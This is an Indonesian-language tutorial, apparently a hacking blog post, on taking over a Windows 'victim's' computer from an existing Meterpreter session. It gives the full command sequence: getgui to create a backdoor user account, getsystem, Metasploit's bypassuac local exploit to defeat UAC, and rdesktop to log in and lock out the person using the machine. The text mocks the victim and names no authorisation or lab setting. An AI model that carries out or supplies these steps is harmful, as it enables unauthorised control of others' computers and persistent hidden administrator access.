Cara menambahkan user administrator dan mengontrol dekstop korban dengan metasploit
Mengaktifkan Remote Dekstop Victim setelah masuk Meterpreter
Saya asumsikan kalian sudah mendapat sesi meterpreter dari system target
Untuk tutorial seputar metasploit bisa baca disini
Gunakan getgui untuk membuat account baru agar bisa melakukan remote dekstop connection
run getgui -u usernamebaru -p passwordnya
Untuk mendapatkan hak administrator bisa gunakan perintah
getsystem
Apabila muncul pesan seperti berikut
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:Itu karena UAC (User Account Control System) target sedang aktif. Namun jangan khawatir, metasploit memiliki module exploit untuk melakukan bypass UAC.
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
Sebelum menggunakan module exploit tersebut, kita harus berjalan sebagai background terlebih dahulu
background
Lalu gunakan module exploit exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac
show options
set session 1 (sessions yang sebelumnya di dapatkan)
Lalu kembali jalankan exploitnya
exploit
Seharusnya setelah melakukan bypass UAC kalian sudah mendapatkan hak administrator system
getsystem
Coba jalankan getgui kembali untuk membuat account Remote Desktop Cennection
run getgui -u usernamebaru -p passwordnya
Untuk melakukan remote dekstop bisa gunakan perintah
rdesktop -u username -p password IP iptarget
kwwk ternyata komputer masih digunakan sama si korban :v, pilih yes untuk lock off.
Tunggu beberapa saat
Sukses bro :D. Sudah berhasil login, sekarang kita dapat mengoperasikan komputer korban dengan mouse dan keyboard kita sendiri.
